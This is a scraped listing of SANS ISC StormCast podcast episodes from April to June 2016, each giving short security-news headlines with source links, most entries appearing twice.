Docker Containers Logging https://isc.sans.edu/forums/diary/Docker+Containers+Logging/21121/ Lenovo Suggests Uninstalling Accelerator Application https://support.lenovo.com/us/en/product_security/len_6718 Google Chrome Update http://googlechromereleases.blogspot.com/search/label/Stable%20updates MongoDB Injection http://blog.securelayer7.net/mongodb-security-injection-attacks-with-php/ Ouch! Newsletter https://securingthehuman.sans.org/resources/newsletters/ouch/2016#encryption Detecting DNS Tunneling With Splunk https://www.sans.org/reading-room/whitepapers/dns/splunk-detect-dns-tunneling-37022 Android AV Vulnerabilities https://www.sit.fraunhofer.de/fileadmin/dokumente/Presse/teamsik_advisories_AV.pdf?_=1464692835
6/3/20165 minutes, 20 seconds
Episode Artwork

ISC StormCast for Friday, June 3rd 2016

Docker Containers Logging https://isc.sans.edu/forums/diary/Docker+Containers+Logging/21121/ Lenovo Suggests Uninstalling Accelerator Application https://support.lenovo.com/us/en/product_security/len_6718 Google Chrome Update http://googlechromereleases.blogspot.com/search/label/Stable%20updates MongoDB Injection http://blog.securelayer7.net/mongodb-security-injection-attacks-with-php/ Ouch! Newsletter https://securingthehuman.sans.org/resources/newsletters/ouch/2016#encryption Detecting DNS Tunneling With Splunk https://www.sans.org/reading-room/whitepapers/dns/splunk-detect-dns-tunneling-37022 Android AV Vulnerabilities https://www.sit.fraunhofer.de/fileadmin/dokumente/Presse/teamsik_advisories_AV.pdf?_=1464692835
6/3/20165 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, June 2nd 2016

KeePass Insecure Update https://bogner.sh/2016/03/mitm-attack-against-keepass-2s-update-check/ Possible TeamViewer Breach http://www.theregister.co.uk/2016/06/01/teamviewer_mass_breach_report/ Windows 10 Exploit Offered For Sale https://www.trustwave.com/Resources/SpiderLabs-Blog/Zero-Day-Auction-for-the-Masses/?page=1&year=0&month=0 Intrusion Detection in Depth Minneapolis (July 18-23rd) https://www.sans.org/event/minneapolis-2016/course/intrusion-detection-in-depth
6/2/20165 minutes, 11 seconds
Episode Artwork

ISC StormCast for Thursday, June 2nd 2016

KeePass Insecure Update https://bogner.sh/2016/03/mitm-attack-against-keepass-2s-update-check/ Possible TeamViewer Breach http://www.theregister.co.uk/2016/06/01/teamviewer_mass_breach_report/ Windows 10 Exploit Offered For Sale https://www.trustwave.com/Resources/SpiderLabs-Blog/Zero-Day-Auction-for-the-Masses/?page=1&year=0&month=0 Intrusion Detection in Depth Minneapolis (July 18-23rd) https://www.sans.org/event/minneapolis-2016/course/intrusion-detection-in-depth
6/2/20165 minutes, 11 seconds
Episode Artwork

ISC StormCast for Wednesday, June 1st 2016

Increase in Telnet Scans https://isc.sans.edu/forums/diary/Increase+in+Port+23+telnet+scanning/21115/ Bloatware Introducing Security Flaws in Laptops https://duo.com/blog/out-of-box-exploitation-a-security-analysis-of-oem-updaters Exploit Released for Unpatchable SCADA Controller https://www.exploit-db.com/exploits/37154/ Fail2Ban Adding IPv6 Support https://www.slightfuture.com/security/fail2ban-ipv6 Critical LG Phone Security Flaws http://blog.checkpoint.com/2016/05/29/oems-have-flaws-too-exposing-two-new-lg-vulnerabilities/
5/31/20165 minutes, 59 seconds
Episode Artwork

ISC StormCast for Wednesday, June 1st 2016

Increase in Telnet Scans https://isc.sans.edu/forums/diary/Increase+in+Port+23+telnet+scanning/21115/ Bloatware Introducing Security Flaws in Laptops https://duo.com/blog/out-of-box-exploitation-a-security-analysis-of-oem-updaters Exploit Released for Unpatchable SCADA Controller https://www.exploit-db.com/exploits/37154/ Fail2Ban Adding IPv6 Support https://www.slightfuture.com/security/fail2ban-ipv6 Critical LG Phone Security Flaws http://blog.checkpoint.com/2016/05/29/oems-have-flaws-too-exposing-two-new-lg-vulnerabilities/
5/31/20165 minutes, 59 seconds
Episode Artwork

ISC StormCast for Tuesday, May 31st 2016

Hardcoded Password in Medical Software https://www.kb.cert.org/vuls/id/482135 Google Chorme Update http://googlechromereleases.blogspot.com.au/search/label/Stable%20updates PA DSS Update https://www.pcisecuritystandards.org/document_library JetPack WordPress Plugin XSS vulnerabilties https://jetpack.com/2016/05/27/jetpack-4-0-3-critical-security-update/ Tor Browser Fingerprinting Site https://tor.triop.se Anti-Pastejacking Browser Plugin https://github.com/rocketshipapps/hardenedpaste
5/31/20165 minutes, 16 seconds
Episode Artwork

ISC StormCast for Tuesday, May 31st 2016

Hardcoded Password in Medical Software https://www.kb.cert.org/vuls/id/482135 Google Chorme Update http://googlechromereleases.blogspot.com.au/search/label/Stable%20updates PA DSS Update https://www.pcisecuritystandards.org/document_library JetPack WordPress Plugin XSS vulnerabilties https://jetpack.com/2016/05/27/jetpack-4-0-3-critical-security-update/ Tor Browser Fingerprinting Site https://tor.triop.se Anti-Pastejacking Browser Plugin https://github.com/rocketshipapps/hardenedpaste
5/31/20165 minutes, 16 seconds
Episode Artwork

ISC StormCast for Monday, May 30th 2016

Analysis of a Distributed Denial of Service Attack https://isc.sans.edu/forums/diary/Analysis+of+a+Distributed+Denial+of+Service+DDoS/21109/ Bluecoat CA http://www.theregister.co.uk/2016/05/27/blue_coat_ca_certs/ Google Requires Symantec CAs to Comply With Certificate Transparency https://cabforum.org/pipermail/public/2016-May/007573.html
5/30/20163 minutes, 59 seconds
Episode Artwork

ISC StormCast for Monday, May 30th 2016

Analysis of a Distributed Denial of Service Attack https://isc.sans.edu/forums/diary/Analysis+of+a+Distributed+Denial+of+Service+DDoS/21109/ Bluecoat CA http://www.theregister.co.uk/2016/05/27/blue_coat_ca_certs/ Google Requires Symantec CAs to Comply With Certificate Transparency https://cabforum.org/pipermail/public/2016-May/007573.html
5/30/20163 minutes, 59 seconds
Episode Artwork

ISC StormCast for Friday, May 27th 2016

Keeping an Eye on Tor Traffic https://isc.sans.edu/forums/diary/Keeping+an+Eye+on+Tor+Traffic/21103/ Next Generation Tor Passed First Test https://blog.torproject.org/blog/mission-montreal-building-next-generation-onion-services DDoS Prives Drop https://www.incapsula.com/blog/unmasking-ddos-for-hire-fiverr.html Older Microsoft Office Vulnerabilities Still Used by "APT" Actors https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/
5/27/20165 minutes, 27 seconds
Episode Artwork

ISC StormCast for Friday, May 27th 2016

Keeping an Eye on Tor Traffic https://isc.sans.edu/forums/diary/Keeping+an+Eye+on+Tor+Traffic/21103/ Next Generation Tor Passed First Test https://blog.torproject.org/blog/mission-montreal-building-next-generation-onion-services DDoS Prives Drop https://www.incapsula.com/blog/unmasking-ddos-for-hire-fiverr.html Older Microsoft Office Vulnerabilities Still Used by "APT" Actors https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/
5/27/20165 minutes, 27 seconds
Episode Artwork

ISC StormCast for Thursday, May 26th 2016

DNS Covert Channel Used in Targeted Attacks http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/ Genius Web Annotation Serivce Is Removing Security Headers http://www.theverge.com/2016/5/25/11505454/news-genius-annotate-the-web-content-security-policy-vulnerability Canary Tokens For Windows Binaries http://blog.thinkst.com/2016/05/certified-canarytokens-alerts-from_25.html Cisco Patches IPv6 ND DoS Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160525-ipv6
5/26/20165 minutes, 14 seconds
Episode Artwork

ISC StormCast for Thursday, May 26th 2016

DNS Covert Channel Used in Targeted Attacks http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/ Genius Web Annotation Serivce Is Removing Security Headers http://www.theverge.com/2016/5/25/11505454/news-genius-annotate-the-web-content-security-policy-vulnerability Canary Tokens For Windows Binaries http://blog.thinkst.com/2016/05/certified-canarytokens-alerts-from_25.html Cisco Patches IPv6 ND DoS Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160525-ipv6
5/26/20165 minutes, 14 seconds
Episode Artwork

ISC StormCast for Wednesday, May 25th 2016

Verisign/US-Cert Warn of The Use of Local TLDs for WPAD http://www.verisign.com/assets/labs/MitM-Attack-by-Name-Collision-Cause-Analysis-and-WPAD-Vulnerability-Assessment-in-the-New-gTLD-Era.pdf Proposal To Use TLS for DNS https://www.rfc-editor.org/rfc/rfc7858.txt Azure Blacklists Common Password https://blogs.technet.microsoft.com/ad/2016/05/24/another-117m-leaked-usernames-and-passwords-new-best-practices-azuread-and-msa-can-help/ Google Attempts to Eliminate Passwords http://www.androidauthority.com/google-kills-passwords-trust-api-694394/
5/25/20165 minutes, 26 seconds
Episode Artwork

ISC StormCast for Wednesday, May 25th 2016

Verisign/US-Cert Warn of The Use of Local TLDs for WPAD http://www.verisign.com/assets/labs/MitM-Attack-by-Name-Collision-Cause-Analysis-and-WPAD-Vulnerability-Assessment-in-the-New-gTLD-Era.pdf Proposal To Use TLS for DNS https://www.rfc-editor.org/rfc/rfc7858.txt Azure Blacklists Common Password https://blogs.technet.microsoft.com/ad/2016/05/24/another-117m-leaked-usernames-and-passwords-new-best-practices-azuread-and-msa-can-help/ Google Attempts to Eliminate Passwords http://www.androidauthority.com/google-kills-passwords-trust-api-694394/
5/25/20165 minutes, 26 seconds
Episode Artwork

ISC StormCast for Tuesday, May 24th 2016

Detailed Technical Report Released About Targeted Attack Against RUAG https://isc.sans.edu/forums/diary/Technical+Report+about+the+RUAG+attack/21091/ New Variation of PastJacking Exploit Affecting vim https://github.com/dxa4481/Pastejacking Xen qemu Patch Released to Limit Log File Size http://xenbits.xen.org/xsa/advisory-180.html
5/24/20165 minutes, 4 seconds
Episode Artwork

ISC StormCast for Tuesday, May 24th 2016

Detailed Technical Report Released About Targeted Attack Against RUAG https://isc.sans.edu/forums/diary/Technical+Report+about+the+RUAG+attack/21091/ New Variation of PastJacking Exploit Affecting vim https://github.com/dxa4481/Pastejacking Xen qemu Patch Released to Limit Log File Size http://xenbits.xen.org/xsa/advisory-180.html
5/24/20165 minutes, 4 seconds
Episode Artwork

ISC StormCast for Monday, May 23rd 2016

Missing MRU Registry Keys For Files Opened With Winzip https://isc.sans.edu/forums/diary/The+strange+case+of+WinZip+MRU+Registry+key/21087/ OWASP Asking for Top 10 Overhaul Input https://twitter.com/wichers/status/733855223832272896 Google is Updating the Safe Browsing API https://security.googleblog.com/2016/05/evolving-safe-browsing-api.html Facebook Sued Over Scanning Of Private Messages https://cdn2.vox-cdn.com/uploads/chorus_asset/file/6509911/campbell-certification-order.0.pdf Malware Stores Code in Macro UI Buttons https://blogs.technet.microsoft.com/mmpc/2016/05/17/malicious-macro-using-a-sneaky-new-trick/ SANSFIRE 2016 https://www.sans.org/event/sansfire-2016
5/23/20165 minutes, 37 seconds
Episode Artwork

ISC StormCast for Monday, May 23rd 2016

Missing MRU Registry Keys For Files Opened With Winzip https://isc.sans.edu/forums/diary/The+strange+case+of+WinZip+MRU+Registry+key/21087/ OWASP Asking for Top 10 Overhaul Input https://twitter.com/wichers/status/733855223832272896 Google is Updating the Safe Browsing API https://security.googleblog.com/2016/05/evolving-safe-browsing-api.html Facebook Sued Over Scanning Of Private Messages https://cdn2.vox-cdn.com/uploads/chorus_asset/file/6509911/campbell-certification-order.0.pdf Malware Stores Code in Macro UI Buttons https://blogs.technet.microsoft.com/mmpc/2016/05/17/malicious-macro-using-a-sneaky-new-trick/ SANSFIRE 2016 https://www.sans.org/event/sansfire-2016
5/23/20165 minutes, 37 seconds
Episode Artwork

ISC StormCast for Friday, May 20th 2016

EITest Campaign Still Going Strong https://isc.sans.edu/forums/diary/EITest+campaign+still+going+strong/21081/ Android Malware Affecting Google Pay Acceptance http://www.theregister.co.uk/2016/05/19/android_pay_analysis/ OS 9.3 Restricts Use Of Fingerprint https://www.apple.com/business/docs/iOS_Security_Guide.pdf
5/20/20164 minutes, 57 seconds
Episode Artwork

ISC StormCast for Friday, May 20th 2016

EITest Campaign Still Going Strong https://isc.sans.edu/forums/diary/EITest+campaign+still+going+strong/21081/ Android Malware Affecting Google Pay Acceptance http://www.theregister.co.uk/2016/05/19/android_pay_analysis/ OS 9.3 Restricts Use Of Fingerprint https://www.apple.com/business/docs/iOS_Security_Guide.pdf
5/20/20164 minutes, 57 seconds
Episode Artwork

ISC StormCast for Thursday, May 19th 2016

Teslacrypt Shutting Down and Releasing Master Key http://www.bleepingcomputer.com/news/security/teslacrypt-shuts-down-and-releases-master-decryption-key/ Office 365 Risks https://www.skyhighnetworks.com/cloud-security-blog/7-charts-reveal-the-meteoric-rise-of-office-365/ LinkedIn Data Leaked From Past Breach https://twitter.com/troyhunt/status/732838759390191617 Google Discontinuing SSLv3/RC4 Support for SMTP http://googleappsupdates.blogspot.ro/2016/05/disabling-support-for-sslv3-and-rc4-for.html
5/19/20165 minutes, 16 seconds
Episode Artwork

ISC StormCast for Thursday, May 19th 2016

Teslacrypt Shutting Down and Releasing Master Key http://www.bleepingcomputer.com/news/security/teslacrypt-shuts-down-and-releases-master-decryption-key/ Office 365 Risks https://www.skyhighnetworks.com/cloud-security-blog/7-charts-reveal-the-meteoric-rise-of-office-365/ LinkedIn Data Leaked From Past Breach https://twitter.com/troyhunt/status/732838759390191617 Google Discontinuing SSLv3/RC4 Support for SMTP http://googleappsupdates.blogspot.ro/2016/05/disabling-support-for-sslv3-and-rc4-for.html
5/19/20165 minutes, 16 seconds
Episode Artwork

ISC StormCast for Wednesday, May 18th 2016

Exploit for Recently Patched Cisco IKEv1/v2 Bufferoverflow Published https://isc.sans.edu/forums/diary/Exploit+Available+For+Cisco+IKEv1+and+IKEv2+Buffer+Overflow+Vulnerability/21065/ Symantec Antivirus Engine Malformed PE Header Parser Vulnerability https://isc.sans.edu/forums/diary/CVE20162208+Symantec+Antivirus+Engine+Malformed+PE+Header+Parser+Memory+Access+Violation/21069/ New CryptXXX Decryption Tool From Kaspersky https://blog.kaspersky.com/cryptxxx-decryption-20/12091/ More Malware in Google Play Store http://blog.checkpoint.com/2016/05/09/viking-horde-a-new-type-of-android-malware-on-google-play/ iPadPro Crashes After Updating to iOS 9.3.2 http://www.macrumors.com/2016/05/17/9-7-inch-ipad-pro-crashing-issues-safari/ New Remote Code Execution in Magento E-Commerce Software http://netanelrub.in/2016/05/17/magento-unauthenticated-remote-code-execution/
5/18/20165 minutes, 23 seconds
Episode Artwork

ISC StormCast for Wednesday, May 18th 2016

Exploit for Recently Patched Cisco IKEv1/v2 Bufferoverflow Published https://isc.sans.edu/forums/diary/Exploit+Available+For+Cisco+IKEv1+and+IKEv2+Buffer+Overflow+Vulnerability/21065/ Symantec Antivirus Engine Malformed PE Header Parser Vulnerability https://isc.sans.edu/forums/diary/CVE20162208+Symantec+Antivirus+Engine+Malformed+PE+Header+Parser+Memory+Access+Violation/21069/ New CryptXXX Decryption Tool From Kaspersky https://blog.kaspersky.com/cryptxxx-decryption-20/12091/ More Malware in Google Play Store http://blog.checkpoint.com/2016/05/09/viking-horde-a-new-type-of-android-malware-on-google-play/ iPadPro Crashes After Updating to iOS 9.3.2 http://www.macrumors.com/2016/05/17/9-7-inch-ipad-pro-crashing-issues-safari/ New Remote Code Execution in Magento E-Commerce Software http://netanelrub.in/2016/05/17/magento-unauthenticated-remote-code-execution/
5/18/20165 minutes, 23 seconds
Episode Artwork

ISC StormCast for Tuesday, May 17th 2016

419 Death Scams Still Going Around https://isc.sans.edu/forums/diary/An+oldie+but+a+goodie+419+Death+Scam/21061/ Apple Updates https://support.apple.com/en-us/HT201222 Flash Zero Day Details https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html Google "HTML5 By Default" Draft https://docs.google.com/presentation/d/106_KLNJfwb9L-1hVVa4i29aw1YXUy9qFX-Ye4kvJj-4/edit#slide=id.p
5/17/20167 minutes
Episode Artwork

ISC StormCast for Tuesday, May 17th 2016

419 Death Scams Still Going Around https://isc.sans.edu/forums/diary/An+oldie+but+a+goodie+419+Death+Scam/21061/ Apple Updates https://support.apple.com/en-us/HT201222 Flash Zero Day Details https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html Google "HTML5 By Default" Draft https://docs.google.com/presentation/d/106_KLNJfwb9L-1hVVa4i29aw1YXUy9qFX-Ye4kvJj-4/edit#slide=id.p
5/17/20167 minutes
Episode Artwork

ISC StormCast for Monday, May 16th 2016

Python Malware https://isc.sans.edu/forums/diary/Python+Malware+Part+1/21057/ Ubiquity AirOS Worm http://community.ubnt.com/t5/airMAX-General-Discussion/Virus-attack-URGENT-UBNT/td-p/1562940 Google Chrome Update http://www.theregister.co.uk/2016/05/13/google_crushes_five_vulns_with_patch_run_and_20k_in_bug_bounties/ More Banks Affected By Fake SWIFT Transactions http://www.nytimes.com/2016/05/13/business/dealbook/swift-global-bank-network-attack.html?_r=0 Microsoft Releases Windows 10 Security Auditing And Monitoring Reference https://www.microsoft.com/en-us/download/details.aspx?id=52630
5/16/20165 minutes, 24 seconds
Episode Artwork

ISC StormCast for Monday, May 16th 2016

Python Malware https://isc.sans.edu/forums/diary/Python+Malware+Part+1/21057/ Ubiquity AirOS Worm http://community.ubnt.com/t5/airMAX-General-Discussion/Virus-attack-URGENT-UBNT/td-p/1562940 Google Chrome Update http://www.theregister.co.uk/2016/05/13/google_crushes_five_vulns_with_patch_run_and_20k_in_bug_bounties/ More Banks Affected By Fake SWIFT Transactions http://www.nytimes.com/2016/05/13/business/dealbook/swift-global-bank-network-attack.html?_r=0 Microsoft Releases Windows 10 Security Auditing And Monitoring Reference https://www.microsoft.com/en-us/download/details.aspx?id=52630
5/16/20165 minutes, 24 seconds
Episode Artwork

ISC StormCast for Friday, May 13th 2016

Adobe Flash Player Update Released https://helpx.adobe.com/security/products/flash-player/apsb16-15.html Microsoft Excel Phishing https://isc.sans.edu/forums/diary/Another+Day+Another+Wave+of+Phishing+Emails/21045/ Squid Proxy Bug Allows For Cache Poisoning http://bugs.squid-cache.org/show_bug.cgi?id=4501 Nation State Attackers May Exploit Firefox https://blog.mozilla.org/blog/2016/05/11/advanced-disclosure-needed-to-keep-users-secure/
5/12/20165 minutes, 26 seconds
Episode Artwork

ISC StormCast for Friday, May 13th 2016

Adobe Flash Player Update Released https://helpx.adobe.com/security/products/flash-player/apsb16-15.html Microsoft Excel Phishing https://isc.sans.edu/forums/diary/Another+Day+Another+Wave+of+Phishing+Emails/21045/ Squid Proxy Bug Allows For Cache Poisoning http://bugs.squid-cache.org/show_bug.cgi?id=4501 Nation State Attackers May Exploit Firefox https://blog.mozilla.org/blog/2016/05/11/advanced-disclosure-needed-to-keep-users-secure/
5/12/20165 minutes, 26 seconds
Episode Artwork

ISC StormCast for Thursday, May 12th 2016

Exploited Flash Vulnerablity Patched Only For Windows https://helpx.adobe.com/security/products/flash-player/apsa16-02.html SAP Vulnerabilities Exploited https://www.onapsis.com/threat-report-tip-iceberg-wild-exploitation-cyber-attacks-sap-business-applications Free Decryption Tool For CryptXXX No Longer Works https://www.proofpoint.com/us/threat-insight/post/cryptxxx2-ransomware-authors-strike-back-against-free-decryption-tool Multiple 7-Zip Vulnerabilities http://blog.talosintel.com/2016/05/multiple-7-zip-vulnerabilities.html Ransomware Overview https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/edit#gid=0
5/12/20164 minutes, 44 seconds
Episode Artwork

ISC StormCast for Thursday, May 12th 2016

Exploited Flash Vulnerablity Patched Only For Windows https://helpx.adobe.com/security/products/flash-player/apsa16-02.html SAP Vulnerabilities Exploited https://www.onapsis.com/threat-report-tip-iceberg-wild-exploitation-cyber-attacks-sap-business-applications Free Decryption Tool For CryptXXX No Longer Works https://www.proofpoint.com/us/threat-insight/post/cryptxxx2-ransomware-authors-strike-back-against-free-decryption-tool Multiple 7-Zip Vulnerabilities http://blog.talosintel.com/2016/05/multiple-7-zip-vulnerabilities.html Ransomware Overview https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/edit#gid=0
5/12/20164 minutes, 44 seconds
Episode Artwork

ISC StormCast for Wednesday, May 11th 2016

Windows Patch Tuesday https://isc.sans.edu/mspatchdays.html?viewday=2016-05-10 Adobe Patch Tuesday https://helpx.adobe.com/security.html
5/11/20168 minutes, 6 seconds
Episode Artwork

ISC StormCast for Wednesday, May 11th 2016

Windows Patch Tuesday https://isc.sans.edu/mspatchdays.html?viewday=2016-05-10 Adobe Patch Tuesday https://helpx.adobe.com/security.html
5/11/20168 minutes, 6 seconds
Episode Artwork

ISC StormCast for Tuesday, May 10th 2016

Network Forensics With DShell https://isc.sans.edu/forums/diary/Performing+network+forensics+with+Dshell+Part+1+Basic+usage/21035/ Aruba Vulnerabilities (and Patches) http://seclists.org/fulldisclosure/2016/May/19 Allwinner Android Device Debug Backdoor http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/ ImageTragick Flaw Being Exploited https://blog.cloudflare.com/inside-imagetragick-the-real-payloads-being-used-to-hack-websites-2/ Attacking JSON Web Tokens https://www.notsosecure.com/crafting-way-json-web-tokens/ ASUS UEFI Red Screen Of Death Workaround https://www.asus.com/support/FAQ/1016356/
5/10/20166 minutes, 5 seconds
Episode Artwork

ISC StormCast for Tuesday, May 10th 2016

Network Forensics With DShell https://isc.sans.edu/forums/diary/Performing+network+forensics+with+Dshell+Part+1+Basic+usage/21035/ Aruba Vulnerabilities (and Patches) http://seclists.org/fulldisclosure/2016/May/19 Allwinner Android Device Debug Backdoor http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/ ImageTragick Flaw Being Exploited https://blog.cloudflare.com/inside-imagetragick-the-real-payloads-being-used-to-hack-websites-2/ Attacking JSON Web Tokens https://www.notsosecure.com/crafting-way-json-web-tokens/ ASUS UEFI Red Screen Of Death Workaround https://www.asus.com/support/FAQ/1016356/
5/10/20166 minutes, 5 seconds
Episode Artwork

ISC StormCast for Monday, May 9th 2016

A Quick Introduction To Linux Capabilities https://isc.sans.edu/forums/diary/Guest+Diary+Linux+Capabilities+A+friend+and+foe/21031/ Review of TLS Proxy Security Issues http://users.encs.concordia.ca/~mmannan/publications/ssl-interception-ndss2016.pdf Ransomware Claims to Donate Proceeds To Charity https://heimdalsecurity.com/blog/security-alert-new-ransomware-donate-earnings-charity/
5/9/20165 minutes, 14 seconds
Episode Artwork

ISC StormCast for Monday, May 9th 2016

A Quick Introduction To Linux Capabilities https://isc.sans.edu/forums/diary/Guest+Diary+Linux+Capabilities+A+friend+and+foe/21031/ Review of TLS Proxy Security Issues http://users.encs.concordia.ca/~mmannan/publications/ssl-interception-ndss2016.pdf Ransomware Claims to Donate Proceeds To Charity https://heimdalsecurity.com/blog/security-alert-new-ransomware-donate-earnings-charity/
5/9/20165 minutes, 14 seconds
Episode Artwork

ISC StormCast for Friday, May 6th 2016

Large Number of Credentials Offered For Sale http://www.reuters.com/article/us-cyber-passwords-idUSKCN0XV1I6 Alphalocker: Affordable Ransom Ware https://blog.cylance.com/an-introduction-to-alphalocker JAKU Botnet https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf Juniper Update http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10734&cat=SIRT_1&actp=LIST
5/6/20165 minutes, 15 seconds
Episode Artwork

ISC StormCast for Friday, May 6th 2016

Large Number of Credentials Offered For Sale http://www.reuters.com/article/us-cyber-passwords-idUSKCN0XV1I6 Alphalocker: Affordable Ransom Ware https://blog.cylance.com/an-introduction-to-alphalocker JAKU Botnet https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf Juniper Update http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10734&cat=SIRT_1&actp=LIST
5/6/20165 minutes, 15 seconds
Episode Artwork

ISC StormCast for Thursday, May 5th 2016

Malicious Ads Seens On CBS TV Stations https://blog.malwarebytes.org/threat-analysis/2016/05/cbs-affiliated-television-stations-expose-visitors-to-angler-exploit-kit/ ImageMagick Vulnerability https://isc.sans.edu/forums/diary/ImageTragick+Another+Vulnerability+Another+Nickname/21023/ Fake DDoS Threats Continue http://www.actionfraud.police.uk/news/online-extortion-demands-affecting-businesses-apr16/ Cisco Patches Tele Presence Equipment https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160504-tpxml Cracking PeopleSoft PS_TOKEN with oclHashcat http://blog.gosecure.ca/2016/05/04/oracle-peoplesoft-still-a-threat-for-enterprises/
5/5/20161 minute, 3 seconds
Episode Artwork

ISC StormCast for Thursday, May 5th 2016

Malicious Ads Seens On CBS TV Stations https://blog.malwarebytes.org/threat-analysis/2016/05/cbs-affiliated-television-stations-expose-visitors-to-angler-exploit-kit/ ImageMagick Vulnerability https://isc.sans.edu/forums/diary/ImageTragick+Another+Vulnerability+Another+Nickname/21023/ Fake DDoS Threats Continue http://www.actionfraud.police.uk/news/online-extortion-demands-affecting-businesses-apr16/ Cisco Patches Tele Presence Equipment https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160504-tpxml Cracking PeopleSoft PS_TOKEN with oclHashcat http://blog.gosecure.ca/2016/05/04/oracle-peoplesoft-still-a-threat-for-enterprises/
5/5/20161 minute, 3 seconds
Episode Artwork

ISC StormCast for Wednesday, May 4th 2016

OpenSSL Update Released https://isc.sans.edu/forums/diary/OpenSSL+Updates/21015/ Gerber Exploit Kit Installed By Neutrino EK https://isc.sans.edu/forums/diary/Neutrino+exploit+kit+sends+Cerber+ransomware/21017/ Image Magick Vulnerablity https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588 http://www.openwall.com/lists/oss-security/2016/05/03/18 Microsoft Will No Longer Consider SHA-1 Certificates As Secure https://blogs.windows.com/msedgedev/2016/04/29/sha1-deprecation-roadmap/
5/4/20161 minute, 39 seconds
Episode Artwork

ISC StormCast for Wednesday, May 4th 2016

OpenSSL Update Released https://isc.sans.edu/forums/diary/OpenSSL+Updates/21015/ Gerber Exploit Kit Installed By Neutrino EK https://isc.sans.edu/forums/diary/Neutrino+exploit+kit+sends+Cerber+ransomware/21017/ Image Magick Vulnerablity https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588 http://www.openwall.com/lists/oss-security/2016/05/03/18 Microsoft Will No Longer Consider SHA-1 Certificates As Secure https://blogs.windows.com/msedgedev/2016/04/29/sha1-deprecation-roadmap/
5/4/20161 minute, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, May 3rd 2016

Fake Google Chrome Update Installs Malware on Android https://www.zscaler.com/blogs/research/android-infostealer-posing-fake-google-chrome-update Android May Security Bulletin https://source.android.com/security/bulletin/2016-05-01.html Google Chrome Update https://source.android.com/security/bulletin/2016-05-01.html Pwned List Got Pwned http://krebsonsecurity.com/2016/05/how-the-pwnedlist-got-pwned/
5/3/20165 minutes, 29 seconds
Episode Artwork

ISC StormCast for Tuesday, May 3rd 2016

Fake Google Chrome Update Installs Malware on Android https://www.zscaler.com/blogs/research/android-infostealer-posing-fake-google-chrome-update Android May Security Bulletin https://source.android.com/security/bulletin/2016-05-01.html Google Chrome Update https://source.android.com/security/bulletin/2016-05-01.html Pwned List Got Pwned http://krebsonsecurity.com/2016/05/how-the-pwnedlist-got-pwned/
5/3/20165 minutes, 29 seconds
Episode Artwork

ISC StormCast for Monday, May 2nd 2016

ATM Jackpotting: Analysis of ATM APIs https://securelist.com/analysis/publications/74533/malware-and-non-malware-ways-for-atm-jackpotting-extended-cut/ Reverse Engineering A ATM Machine Skimmer https://trustfoundry.net/reverse-engineering-a-discovered-atm-skimmer/ Bathroom Scale Vulnerability https://help.fitbit.com/articles/en_US/Help_article/How-do-I-update-my-Aria-scale/ Fake Mobile Payment Apps in Google Play Store https://info.phishlabs.com/blog/fraudster-phishing-users-with-malicious-mobile-apps
5/2/20165 minutes, 44 seconds
Episode Artwork

ISC StormCast for Monday, May 2nd 2016

ATM Jackpotting: Analysis of ATM APIs https://securelist.com/analysis/publications/74533/malware-and-non-malware-ways-for-atm-jackpotting-extended-cut/ Reverse Engineering A ATM Machine Skimmer https://trustfoundry.net/reverse-engineering-a-discovered-atm-skimmer/ Bathroom Scale Vulnerability https://help.fitbit.com/articles/en_US/Help_article/How-do-I-update-my-Aria-scale/ Fake Mobile Payment Apps in Google Play Store https://info.phishlabs.com/blog/fraudster-phishing-users-with-malicious-mobile-apps
5/2/20165 minutes, 44 seconds
Episode Artwork

ISC StormCast for Friday, April 29th 2016

Powershell and DNS/DHCP https://isc.sans.edu/forums/diary/DNS+and+DHCP+Recon+using+Powershell/20995/ New Version of PCI Standard Released https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2_Summary_of_Changes.pdf OpenSSL Patch Pre-Announced https://mta.openssl.org/pipermail/openssl-announce/2016-April/000069.html NTP Patches http://blog.talosintel.com/2016/04/vulnerability-spotlight-further-ntpd_27.html#more
4/29/20165 minutes, 9 seconds
Episode Artwork

ISC StormCast for Friday, April 29th 2016

Powershell and DNS/DHCP https://isc.sans.edu/forums/diary/DNS+and+DHCP+Recon+using+Powershell/20995/ New Version of PCI Standard Released https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2_Summary_of_Changes.pdf OpenSSL Patch Pre-Announced https://mta.openssl.org/pipermail/openssl-announce/2016-April/000069.html NTP Patches http://blog.talosintel.com/2016/04/vulnerability-spotlight-further-ntpd_27.html#more
4/29/20165 minutes, 9 seconds
Episode Artwork

ISC StormCast for Thursday, April 28th 2016

